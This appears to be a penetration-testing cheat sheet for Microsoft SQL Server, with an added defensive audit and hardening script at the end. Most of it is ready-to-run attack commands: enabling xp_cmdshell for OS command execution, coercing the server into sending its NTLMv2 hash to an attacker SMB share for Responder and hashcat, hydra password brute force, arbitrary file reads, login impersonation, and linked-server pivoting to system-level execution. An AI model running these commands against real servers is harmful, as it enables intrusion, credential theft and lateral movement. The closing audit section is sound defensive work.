Connect to MSSQL
To connect to MSSQL from a Linux host using Impacket's mssqlclient.py (the second form uses Windows authentication).
mssqlclient.py {DOMAIN}/{USER}:{PASSWORD}@{IP}
mssqlclient.py {DOMAIN}/{USER}:{PASSWORD}@{IP} -windows-auth
List Databases
To list databases in MSSQL.
SELECT name FROM master.dbo.sysdatabases
Using mssqlclient.py
enum_db
List Tables
To list tables in MSSQL.
select table_name from {DB_NAME}.INFORMATION_SCHEMA.TABLES;
List Table Content
To list the content of a table in MSSQL.
select * from {TABLE_NAME};
Change Database
To change database in MSSQL.
use {DB_NAME}
Command Shell
In Microsoft SQL Server, xp_cmdshell is a built-in extended stored procedure that allows executing operating system commands from within SQL Server. This feature is disabled by default, but we can try to enable it and execute commands.
sp_configure 'show advanced options', 1
RECONFIGURE
sp_configure 'xp_cmdshell', 1
RECONFIGURE
xp_cmdshell "whoami"
The same can also be done using mssqlclient.py
enable_xp_cmdshell
xp_cmdshell "whoami"
Hash Capture
We can try to use responder to capture the NTLMv2 hash that the mssqlsvc account sends when the server is made to connect to a non-existent share. We can then attempt to crack the hash using hashcat.
Step 1: Start responder
sudo responder -I tun0
Step 2: Have the MSSQL server authenticate to our responder SMB server.
SQL (htbdbuser guest@master)> EXEC master..xp_dirtree '\\10.10.15.209\share'
Step 3: Crack the NTLMv2 hash using hashcat
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt -o cracked.txt
Password Bruteforce
We can use hydra to bruteforce passwords.
hydra -l shelled -P /usr/share/wordlists/rockyou.txt {IP} mssql
File Read
By default, MSSQL allows reading any file on the operating system to which the account has read access. We can use the following SQL query:
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
Impersonate
SQL Server has a special permission, named IMPERSONATE, that allows the executing user to take on the permissions of another user or login until the context is reset or the session ends.
Step 1: Check which users we can impersonate
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
Step 2: Impersonate user
EXECUTE AS LOGIN = 'josh'
Step 3: Verify we are impersonating user
SELECT SYSTEM_USER
Step 4: Check if we have sysadmin privileges (If returned value is 0, then we do not have sysadmin privileges)
SELECT IS_SRVROLEMEMBER('sysadmin')
Linked Database
MSSQL has a configuration option called linked servers. If we manage to gain access to a SQL Server with a linked server configured, we may be able to move laterally to that database server.
Step 1: Check if there are any linked databases (If the isremote value is 0, then it is a linked server)
SQL (josh guest@master)> SELECT srvname, isremote FROM sysservers
srvname isremote
--------------------- --------
WINSRV02\SQLEXPRESS 1
LOCAL.TEST.LINKED.SRV 0
Step 2: The EXECUTE statement can be used to send pass-through commands to linked servers. We put our command in parentheses and specify the linked server in square brackets ([ ]).
SQL (josh guest@master)> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [LOCAL.TEST.LINKED.SRV]
------------------------------ ------------------------------ ------------------------------ -----------
DESKTOP-0L9D4KA\LOCAL.TEST.LINKED.SRV Microsoft SQL Server 2019 (RTM sa_remote 1
Step 3: If we have sysadmin privileges in the linked database, then we can enable and execute xp_cmdshell on that database.
SQL (josh guest@master)> EXECUTE('xp_cmdshell "whoami"') AT [LOCAL.TEST.LINKED.SRV]
-------------------
nt authority\system
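The Command Shell, Impersonate and Linked Database sections above all depend on server-level settings and grants that a DBA can review. The following T-SQL audit and hardening script is an added example, not part of the original notes; it only uses the documented system catalog views (sys.configurations, sys.server_permissions, sys.servers, sys.server_role_members) and assumes it is run by a login with VIEW SERVER STATE or sysadmin rights.

```sql
-- Added defender-side audit (not from the original cheat sheet).
-- 1. Command-execution surface: value_in_use = 1 means the feature is on.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures',
               'Ad Hoc Distributed Queries', 'show advanced options');

-- 2. IMPERSONATE grants: who may run EXECUTE AS LOGIN = <target>.
--    class 101 = server principal; major_id is the login being impersonated.
SELECT grantee.name AS grantee,
       target.name  AS can_impersonate,
       perm.state_desc
FROM sys.server_permissions perm
JOIN sys.server_principals grantee ON perm.grantee_principal_id = grantee.principal_id
JOIN sys.server_principals target  ON perm.major_id = target.principal_id
WHERE perm.class = 101 AND perm.permission_name = 'IMPERSONATE';

-- 3. Linked servers: RPC Out must be enabled for EXECUTE(...) AT [server]
--    pass-through to work, so disable it where a link does not need it.
SELECT name, data_source, is_rpc_out_enabled, is_remote_login_enabled
FROM sys.servers
WHERE is_linked = 1;

-- 4. Logins holding sysadmin (the high-value impersonation / link targets).
SELECT p.name, p.type_desc, p.is_disabled
FROM sys.server_role_members rm
JOIN sys.server_principals r ON rm.role_principal_id   = r.principal_id
JOIN sys.server_principals p ON rm.member_principal_id = p.principal_id
WHERE r.name = 'sysadmin';

-- 5. Remediation for an instance that does not need OS command execution.
--    xp_cmdshell is an advanced option, so it can only be changed while
--    'show advanced options' is 1; hide advanced options again afterwards.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 6. Remove RPC Out on a link that should be read-only (name is a placeholder).
EXEC sp_serveroption @server = N'<LINKED_SERVER_NAME>', @optname = N'rpc out', @optvalue = N'false';
```

Run sections 1 to 4 first and keep the output as a baseline; any later change to these rows (xp_cmdshell flipping to 1, a new IMPERSONATE grant, a new sysadmin member) is worth investigating, since those are exactly the changes the attack steps above produce.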